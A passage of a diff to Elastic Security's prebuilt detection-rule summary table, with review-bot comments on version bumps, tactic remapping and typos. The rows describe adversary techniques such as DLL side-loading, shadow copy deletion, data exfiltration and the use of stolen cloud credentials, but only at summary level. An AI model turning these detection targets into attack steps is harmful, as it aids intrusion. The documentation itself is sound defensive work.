Adversaries may use this technique to maintain persistence or run with System privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.4.0 |5 -|<<unsigned-dll-loaded-by-a-trusted-process, Unsigned DLL Loaded by a Trusted Process>> |Identifies digitally signed (trusted) processes loading unsigned DLLs. Attackers may plant their payloads into the application folder and invoke the legitimate application to execute the payload, masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 +|<<unsigned-dll-loaded-by-a-trusted-process, Unsigned DLL Loaded by a Trusted Process>> |Identifies digitally signed (trusted) processes loading unsigned DLLs. Attackers may plant their payloads into the application folder and invoke the legitimate application to execute the payload, masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.4.0 |101 -|<<unsigned-dll-side-loading-from-a-suspicious-folder, Unsigned DLL Side-Loading from a Suspicious Folder>> |Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.4.0 |4 +|<<unsigned-dll-side-loading-from-a-suspicious-folder, Unsigned DLL Side-Loading from a Suspicious Folder>> |Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.4.0 |5 -|<<untrusted-driver-loaded, Untrusted Driver Loaded>> |Identifies attempt to load an untrusted driver. Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 +|<<untrusted-driver-loaded, Untrusted Driver Loaded>> |Identifies attempt to load an untrusted driver. Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |6 -|<<unusual-aws-command-for-a-user, Unusual AWS Command for a User>> |A machine learning job detected an AWS API command that, while not inherently suspicious or abnormal, is being made by a user context that does not normally use the command. This can be the result of compromised credentials or keys as someone uses a valid account to persist, move laterally, or exfiltrate data. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<unusual-aws-command-for-a-user, Unusual AWS Command for a User>> |A machine learning job detected an AWS API command that, while not inherently suspicious or abnormal, is being made by a user context that does not normally use the command. This can be the result of compromised credentials or keys as someone uses a valid account to persist, move laterally, or exfiltrate data. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 |<<unusual-child-process-from-a-system-virtual-process, Unusual Child Process from a System Virtual Process>> |Identifies a suspicious child process of the Windows virtual system process, which could indicate code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<unusual-child-process-of-dns-exe, Unusual Child Process of dns.exe>> |Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |106 +|<<unusual-child-process-of-dns-exe, Unusual Child Process of dns.exe>> |Identifies an unexpected process spawning from dns.exe, the process responsible for Windows DNS server services, which may indicate activity related to remote code execution or other forms of exploitation. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |107 |<<unusual-child-processes-of-rundll32, Unusual Child Processes of RunDLL32>> |Identifies child processes of unusual instances of RunDLL32 where the command line parameters were suspicious. Misuse of RunDLL32 could indicate malicious activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 -|<<unusual-city-for-an-aws-command, Unusual City For an AWS Command>> |A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (city) that is unusual for the command. This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<unusual-city-for-an-aws-command, Unusual City For an AWS Command>> |A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (city) that is unusual for the command. This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 -|<<unusual-country-for-an-aws-command, Unusual Country For an AWS Command>> |A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (country) that is unusual for the command. 
This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<unusual-country-for-an-aws-command, Unusual Country For an AWS Command>> |A machine learning job detected AWS command activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (country) that is unusual for the command. This can be the result of compromised credentials or keys being used by a threat actor in a different geography than the authorized user(s). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 |<<unusual-dns-activity, Unusual DNS Activity>> |A machine learning job detected a rare and unusual DNS query that indicate network activity with unusual DNS domains. This can be due to initial access, persistence, command-and-control, or exfiltration activity. For example, when a user clicks on a link in a phishing email or opens a malicious document, a request may be sent to download and run a payload from an uncommon domain. When malware is already running, it may send requests to an uncommon DNS domain the malware uses for command-and-control communication. |[Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.3.0 |103 
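Review bot: Several rows in this hunk raise the minimum stack version, not just the rule version: Unauthorized Access to an Okta Application moves from `8.3.0 |105` to `8.10.0 |206`, and the three Unusual AWS ML rows (Command for a User, City, Country) move from `8.3.0 |107` to `8.9.0 |208`. Users on 8.3 through 8.9 will lose these rules from the pre-built set, so confirm the jumps are intentional and that the release notes state which feature required the newer stack. Two smaller points in the same hunk: Unusual Child Process of dns.exe changes tactic from `[Tactic: Initial Access]` to `[Tactic: Lateral Movement]` with the description unchanged, so the page does not explain the remap; and the Unsigned DLL Side-Loading from a Suspicious Folder `+` line keeps the typo "memory space of a signed processes" (should be "a signed process").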
@@ -1772,11 +1846,11 @@ and their rule type is `machine_learning`. |<<unusual-discovery-signal-alert-with-unusual-process-executable, Unusual Discovery Signal Alert with Unusual Process Executable>> |This rule leverages alert data from various Discovery building block rules to alert on signals with unusual unique host.id, user.id and process.executable entries. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: Higher-Order Rule] |8.6.0 |1 -|<<unusual-executable-file-creation-by-a-system-critical-process, Unusual Executable File Creation by a System Critical Process>> |Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<unusual-executable-file-creation-by-a-system-critical-process, Unusual Executable File Creation by a System Critical Process>> |Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<unusual-file-creation-alternate-data-stream, Unusual File Creation - Alternate Data Stream>> |Identifies suspicious creation of Alternate Data Streams on highly targeted files. This is uncommon for legitimate files and sometimes done by adversaries to hide malware. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |111 -|<<unusual-file-modification-by-dns-exe, Unusual File Modification by dns.exe>> |Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |106 +|<<unusual-file-modification-by-dns-exe, Unusual File Modification by dns.exe>> |Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |107 |<<unusual-hour-for-a-user-to-logon, Unusual Hour for a User to Logon>> |A machine learning job detected a user logging in at a time of day that is unusual for the user. This can be due to credentialed access via a compromised account when the user and the threat actor are in different time zones. In addition, unauthorized user activity often takes place during non-business hours. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Initial Access], [Resources: Investigation Guide] |8.3.0 |104 
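Review bot: Unusual File Modification by dns.exe swaps `[Tactic: Initial Access]` for `[Tactic: Lateral Movement]` while its description still talks only about "remote code execution or other forms of exploitation" of the DNS server, which reads as initial access; if the MITRE mapping was deliberately moved to lateral movement, a clause in the description (for example that the DNS server is reached from an already compromised host) would keep the two consistent.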
@@ -1802,7 +1876,7 @@ and their rule type is `machine_learning`. |<<unusual-login-activity, Unusual Login Activity>> |Identifies an unusually high number of authentication attempts. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Credential Access] |8.3.0 |103 -|<<unusual-network-activity-from-a-windows-system-binary, Unusual Network Activity from a Windows System Binary>> |Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<unusual-network-activity-from-a-windows-system-binary, Unusual Network Activity from a Windows System Binary>> |Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<unusual-network-connection-via-dllhost, Unusual Network Connection via DllHost>> |Identifies unusual instances of dllhost.exe making outbound network connections. This may indicate adversarial Command and Control activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 
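Review bot: The `+` line for Unusual Network Activity from a Windows System Binary carries the description "Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection.", which is word for word the description of Unusual Process Network Connection in a later hunk of this same patch; two rules with identical summaries cannot be told apart in this table, so one of them should say what distinguishes it (the binary set or the event type it keys on).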
@@ -1814,7 +1888,7 @@ and their rule type is `machine_learning`. |<<unusual-parent-child-relationship, Unusual Parent-Child Relationship>> |Identifies Windows programs run from unexpected parent processes. This could indicate masquerading or other strange activity on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<unusual-persistence-via-services-registry, Unusual Persistence via Services Registry>> |Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<unusual-persistence-via-services-registry, Unusual Persistence via Services Registry>> |Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<unusual-print-spooler-child-process, Unusual Print Spooler Child Process>> |Detects unusual Print Spooler service (spoolsv.exe) child processes. This may indicate an attempt to exploit privilege escalation vulnerabilities related to the Printing Service on Windows. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 
@@ -1822,9 +1896,9 @@ and their rule type is `machine_learning`. |<<unusual-process-execution-on-wbem-path, Unusual Process Execution on WBEM Path>> |Identifies unusual processes running from the WBEM path, uncommon outside WMI-related Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<unusual-process-extension, Unusual Process Extension>> |Identifies processes running with unusual extensions that are not typically valid for Windows executables. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<unusual-process-extension, Unusual Process Extension>> |Identifies processes running with unusual extensions that are not typically valid for Windows executables. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<unusual-process-for-mssql-service-accounts, Unusual Process For MSSQL Service Accounts>> |Identifies unusual process executions using MSSQL Service accounts, which can indicate the exploitation/compromise of SQL instances. Attackers may exploit exposed MSSQL instances for initial access or lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<unusual-process-for-mssql-service-accounts, Unusual Process For MSSQL Service Accounts>> |Identifies unusual process executions using MSSQL Service accounts, which can indicate the exploitation/compromise of SQL instances. Attackers may exploit exposed MSSQL instances for initial access or lateral movement. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 |<<unusual-process-for-a-linux-host, Unusual Process For a Linux Host>> |Identifies rare processes that do not usually run on individual hosts, which can indicate execution of unauthorized services, malware, or persistence mechanisms. Processes are considered rare when they only run occasionally as compared with other processes running on the host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Persistence] |8.3.0 |104 
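Review bot: the "Unusual Process For MSSQL Service Accounts" row swaps [Tactic: Initial Access] for [Tactic: Lateral Movement], [Tactic: Persistence], but the description in the same row still says attackers "may exploit exposed MSSQL instances for initial access or lateral movement", so tags and text no longer agree; either keep Initial Access in the tag list or reword the description to match the new tactics. In the same hunk the "Unusual Process Extension" row goes from version 1 to 2 with no visible change to description or tags, which is fine for a summary table only if the linked rule-details page carries the actual query change.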
@@ -1832,13 +1906,21 @@ and their rule type is `machine_learning`. |<<unusual-process-network-connection, Unusual Process Network Connection>> |Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<unusual-process-spawned-by-a-host, Unusual Process Spawned by a Host>> |A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. |[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<unusual-process-spawned-by-a-parent-process, Unusual Process Spawned by a Parent Process>> |A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<unusual-process-spawned-by-a-user, Unusual Process Spawned by a User>> |A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. |[Domain: Endpoint], [OS: Windows], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<unusual-process-writing-data-to-an-external-device, Unusual Process Writing Data to an External Device>> |A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + |<<unusual-remote-file-directory, Unusual Remote File Directory>> |An anomaly detection job has detected a remote file transfer on an unusual directory indicating a potential lateral movement activity on the host. Many Security solutions monitor well-known directories for suspicious activities, so attackers might use less common directories to bypass monitoring. 
|[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 |<<unusual-remote-file-extension, Unusual Remote File Extension>> |An anomaly detection job has detected a remote file transfer with a rare extension, which could indicate potential lateral movement activity on the host. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 |<<unusual-remote-file-size, Unusual Remote File Size>> |A machine learning job has detected an unusually high file size shared by a remote host indicating potential lateral movement activity. One of the primary goals of attackers after gaining access to a network is to locate and exfiltrate valuable information. Instead of multiple small transfers that can raise alarms, attackers might choose to bundle data into a single large file transfer. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 -|<<unusual-service-host-child-process-childless-service, Unusual Service Host Child Process - Childless Service>> |Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<unusual-service-host-child-process-childless-service, Unusual Service Host Child Process - Childless Service>> |Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<unusual-source-ip-for-a-user-to-logon-from, Unusual Source IP for a User to Logon from>> |A machine learning job detected a user logging in from an IP address that is unusual for the user. This can be due to credentialed access via a compromised account when the user and the threat actor are in different locations. An unusual source IP address for a username could also be due to lateral movement when a compromised account is used to pivot between hosts. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Initial Access] |8.3.0 |103 
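Review bot: missing space after the comma in the new "Unusual Process Spawned by a User" row ("does not commonly manifest malicious activity,by an unsupervised ML model"); it should read "activity, by an unsupervised ML model". The three sibling ProblemChild rows also disagree on wording: "Unusual Process Spawned by a Host" says the process was "classified as suspicious in two ways" and "predicted to be suspicious by the ProblemChild supervised ML model", while the Parent Process and User rows say "classified as malicious" and "predicted to be malicious"; pick one term for all three rows. The "Unusual Service Host Child Process - Childless Service" row is bumped 105 to 106 with no visible description or tag change, same caveat as the other silent version bumps in this table.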
@@ -1846,7 +1928,7 @@ and their rule type is `machine_learning`. |<<unusual-time-or-day-for-an-rdp-session, Unusual Time or Day for an RDP Session>> |A machine learning job has detected an RDP session started at an usual time or weekday. An RDP session at an unusual time could be followed by other suspicious activities, so catching this is a good first step in detecting a larger attack. |[Use Case: Lateral Movement Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Lateral Movement] |8.9.0 |1 -|<<unusual-user-privilege-enumeration-via-id, Unusual User Privilege Enumeration via id>> |This rule monitors for a sequence of 20 "id" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the "id" command to enumerate the privileges of all users present on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |1 +|<<unusual-user-privilege-enumeration-via-id, Unusual User Privilege Enumeration via id>> |This rule monitors for a sequence of 20 "id" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the "id" command to enumerate the privileges of all users present on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |2 |<<unusual-web-request, Unusual Web Request>> |A machine learning job detected a rare and unusual URL that indicates unusual web browsing activity. This can be due to initial access, persistence, command-and-control, or exfiltration activity. 
For example, in a strategic web compromise or watering hole attack, when a trusted website is compromised to target a particular sector or organization, targeted users may receive emails with uncommon URLs for trusted websites. These URLs can be used to download and run a payload. When malware is already running, it may send requests to uncommon URLs on trusted websites the malware uses for command-and-control communication. When rare URLs are observed being requested for a local web server by a remote source, these can be due to web scanning, enumeration or attack traffic, or they can be due to bots and web scrapers which are part of common Internet background traffic. |[Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.3.0 |103 
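Review bot: the unchanged context row "Unusual Time or Day for an RDP Session" reads "an RDP session started at an usual time or weekday", which is a typo for "an unusual time or weekday" and contradicts the next sentence; since this hunk already touches the adjacent row, fix it here. The "Unusual User Privilege Enumeration via id" bump from 1 to 2 carries no visible text change, so the rule-details page should be the place where the change is visible.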
@@ -1882,7 +1964,7 @@ and their rule type is `machine_learning`. |<<vnc-virtual-network-computing-to-the-internet, VNC (Virtual Network Computing) to the Internet>> |This rule detects network events that may indicate the use of VNC traffic to the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |104 -|<<virtual-machine-fingerprinting, Virtual Machine Fingerprinting>> |An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<virtual-machine-fingerprinting, Virtual Machine Fingerprinting>> |An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<virtual-machine-fingerprinting-via-grep, Virtual Machine Fingerprinting via Grep>> |An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. 
|[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |103 
@@ -1890,19 +1972,19 @@ and their rule type is `machine_learning`. |<<volume-shadow-copy-deleted-or-resized-via-vssadmin, Volume Shadow Copy Deleted or Resized via VssAdmin>> |Identifies use of vssadmin.exe for shadow copy deletion or resizing on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<volume-shadow-copy-deletion-via-powershell, Volume Shadow Copy Deletion via PowerShell>> |Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<volume-shadow-copy-deletion-via-powershell, Volume Shadow Copy Deletion via PowerShell>> |Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<volume-shadow-copy-deletion-via-wmic, Volume Shadow Copy Deletion via WMIC>> |Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<volume-shadow-copy-deletion-via-wmic, Volume Shadow Copy Deletion via WMIC>> |Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<wmi-incoming-lateral-movement, WMI Incoming Lateral Movement>> |Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |107 +|<<wmi-incoming-lateral-movement, WMI Incoming Lateral Movement>> |Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |108 |<<wmi-wbemtest-utility-execution, WMI WBEMTEST Utility Execution>> |Adversaries may abuse the WMI diagnostic tool, wbemtest.exe, to enumerate WMI object instances or invoke methods against local or remote endpoints. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<wmic-remote-command, WMIC Remote Command>> |Identifies the use of wmic.exe to run commands on remote hosts. 
While this can be used by administrators legitimately, attackers can abuse this built-in utility to achieve lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<wmic-remote-command, WMIC Remote Command>> |Identifies the use of wmic.exe to run commands on remote hosts. While this can be used by administrators legitimately, attackers can abuse this built-in utility to achieve lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 |<<wpad-service-exploit, WPAD Service Exploit>> |Identifies probable exploitation of the Web Proxy Auto-Discovery Protocol (WPAD) service. Attackers who have access to the local network or upstream DNS traffic can inject malicious JavaScript to the WPAD service which can lead to a full system compromise. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |None |1 -|<<writedac-access-on-active-directory-object, WRITEDAC Access on Active Directory Object>> |Identifies the access on an object with WRITEDAC 